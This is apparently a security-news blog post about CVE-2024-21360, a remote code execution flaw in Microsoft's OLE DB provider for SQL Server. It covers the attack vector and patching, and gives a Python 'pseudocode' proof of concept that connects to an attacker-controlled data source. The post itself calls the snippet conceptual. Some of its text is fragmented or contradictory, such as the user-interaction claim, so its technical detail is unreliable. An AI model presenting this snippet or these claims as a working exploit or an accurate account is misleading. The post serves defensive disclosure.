CVE CyberSecurity Database News

CVE-2024-21360 - Critical Remote Code Execution via Microsoft WDAC OLE DB Provider for SQL Server

Poster -

A new and critical vulnerability—CVE-2024-21360—was recently made public, affecting the Microsoft WDAC OLE DB provider for SQL Server. This security flaw can allow an attacker to run arbitrary code remotely, which puts organizations at real risk. Here’s everything you need to know: what it is, how it works, the impact, and how to keep your systems safe.

What is CVE-2024-21360?

This CVE is a Remote Code Execution (RCE) vulnerability tied to the Microsoft Windows Data Access Components (WDAC), specifically the OLE DB provider for SQL Server (MSOLEDBSQL). It can be triggered when the component improperly handles objects in memory, leading to code execution with the same privileges as the targeted service or user.

User Interaction: None required (can be weaponized with a simple crafted request)

Official advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21360

The Attack Vector

An attacker can exploit the vulnerability by sending a specially crafted request to an application that uses the vulnerable OLE DB provider to connect to a SQL Server instance. If successful, the attacker may run arbitrary code in the context of the application.

Exploit Details (Code Example)

Below is a proof-of-concept scenario (pseudocode), inspired by public research, to demonstrate exploitation for educational and defensive purposes.

# Pseudocode for abusing the OLE DB connection
import win32com.client

def exploit_ole_db():
    # This requires attacker's crafted payload as the "Data Source"
    connection_string = (
        "Provider=MSOLEDBSQL;"
        "Data Source=attacker-controlled-server;"
        "Initial Catalog=master;"
        "Integrated Security=SSPI;"
    )
    try:
        conn = win32com.client.Dispatch("ADODB.Connection")
        conn.Open(connection_string)
        print("Connected. If server is vulnerable, RCE possible!")
    except Exception as e:
        print(f"Connection failed: {e}")

exploit_ole_db()

In this scenario, the attacker sets up a malicious "Data Source" endpoint that delivers the payload over the network. A vulnerable client connecting to it could trigger remote code execution, especially if the connection is made by a privileged service (like a Windows service or web application pool identity).

Note: This code is conceptual; the real exploit would involve specific manipulation of OLE DB objects and isn't provided here for ethical reasons.

Gain full control over affected systems

- Install programs, view/change/delete data

Create new accounts with full privileges

Depending on configuration, success could mean compromise of backend databases, application servers, and sensitive business data.

1. Patch Immediately

Microsoft released updates to fix this issue. Apply all updates to systems using the MSOLEDBSQL provider:

Download the patch:

Microsoft Security Update Guide for CVE-2024-21360

References

- Microsoft Security Response Center — CVE-2024-21360
- Microsoft OLE DB Driver for SQL Server Documentation
- CISA Known Exploited Vulnerabilities Catalog

Conclusion

CVE-2024-21360 is a serious RCE vulnerability affecting a key Microsoft database connectivity component. By combining network access with a crafted connection, attackers could easily take control of vulnerable systems. Patching immediately and following good network hygiene will keep you safe.

Stay alert, patch fast, and lock down those endpoints!


Stay safe and patched. If you have any questions or tips to share, post them below!

Timeline

Published on: 02/13/2024 18:15:52 UTC
Last modified on: 02/13/2024 18:22:53 UTC